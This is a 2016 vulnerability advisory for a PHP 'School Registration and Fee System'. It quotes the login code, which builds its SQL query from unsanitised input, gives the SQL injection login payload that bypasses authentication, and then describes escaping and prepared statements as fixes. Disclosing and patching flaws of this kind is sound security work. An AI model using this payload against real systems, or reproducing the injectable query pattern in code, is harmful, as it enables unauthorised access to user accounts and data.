# Exploit Title.............. School Registration and Fee System Auth Bypass
# Google Dork................ N/A
# Date....................... 01/11/2016
# Exploit Author............. opt1lc
# Vendor Homepage............ http://www.sourcecodester.com/php/10932/school-registration-and-fee-system.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/hemedy99/bilal_final.zip
# Version.................... N/A
# Tested on.................. XAMPP
# CVE........................ N/A
# File....................... bilal_final/login.php

---------------------------------------------------
----snip----
$username = $_POST['username'];
$password = $_POST['password'];
/* student */
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysql_query($query)or die(mysql_error());
$row = mysql_fetch_array($result);
----snip----
---------------------------------------------------

Exploit
-------
You can log in with the username and password: administrator' or '1'='1

Patching
-------
You can use the PHP function mysql_real_escape_string() to escape the user-supplied values before they are interpolated into the query:

---------------------------------------------------
----snip----
$username = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);
/* student */
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysql_query($query)or die(mysql_error());
$row = mysql_fetch_array($result);
----snip----
---------------------------------------------------

Note that escaping only mitigates the string-built query shown above; the mysql_* extension is deprecated and was removed in PHP 7, so the more robust fix is a prepared statement with bound parameters (mysqli or PDO), which also removes the need to escape by hand.

Credit
-------
This vulnerability was discovered and researched by opt1lc

Shout
-------
My Beautiful Daughter & My Wife

Reference
-------
http://php.net/manual/en/function.mysql-real-escape-string.php